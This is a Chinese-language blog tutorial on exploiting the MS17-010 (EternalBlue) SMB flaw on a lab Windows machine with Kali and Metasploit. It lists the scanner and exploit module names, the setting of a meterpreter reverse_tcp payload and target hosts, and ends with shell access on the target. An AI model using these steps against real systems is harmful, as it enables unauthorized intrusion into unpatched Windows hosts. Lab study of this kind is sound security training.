本次,我们使用Kali,来利用老生常谈的MS17-010漏洞,对靶机进行渗透
渗透环境如下:
名称 | 系统 | IP地址 | 说明 |
---|---|---|---|
攻击机 | Kali | 192.168.100.135 | 用于攻击其他主机的渗透机器 |
靶机 | Windows | 192.168.100.32 | 攻击机攻击的目标 |
1.启动MSF框架
在终端中输入msfconsole,来启动MSF框架
2.探测目标主机是否存在MS17-010漏洞
在msfconsole中输入search MS17-010
探测目标主机是否存在MS17-010漏洞的模块为: auxiliary/scanner/smb/smb_ms17_010
通过use命令使用漏洞模块, 用法为use 模块ID, 在msfconsole中输入use 1,从而利用smb_ms17_010模块,探测目标主机是否存在MS17-010漏洞
在msfconsole中输入show options, 可以得到该模块的详细信息
使用完show options命令之后, 我们可以改模块下需要使用的信息, 我们可以通过set命令,来设置这些参数, 向msfconsole中输入set RHOSTS IP地址
这是完成之后, 向msfconsole中输入run,来运行该模块
运行完成之后, 由图可知,我们可以知晓该目标主机下存在MS17-010漏洞
2.渗透主机
完成上述两步之后,我们现在才开始真正的要使用模块,来渗透目标主机了
再次使用search命令搜索MS17-010漏洞的模块
注: 本次利用的模组为: exploit/windows/smb/ms17_010_eternalblue
通过use命令切换到该模块下
切换过程中,msfconsole提示我们没有设置反弹的shell, 所以我们需要设置他
在msfconsole中输入: set payload windows/x64/meterpreter/reverse_tcp, 用于设置成功后反弹的shell
设置完成之后, 我们就可以开始利用msfconsole渗透目标主机了, 在此之前,我们还需要设置一下参数
在msfconsole中输入set RHOSTS 192.168.100.32
设置完成之后, 我们就可以运行该模块
如果返回的是Win,则代表我们渗透成功了, 此时他会自动进入到cmd模式下,我们可以直接在里面输入cmd命令
有图可知,我们已经入目标主机的系统中, 至于怎么玩,我就不说了,你们自己动手吧
文章评论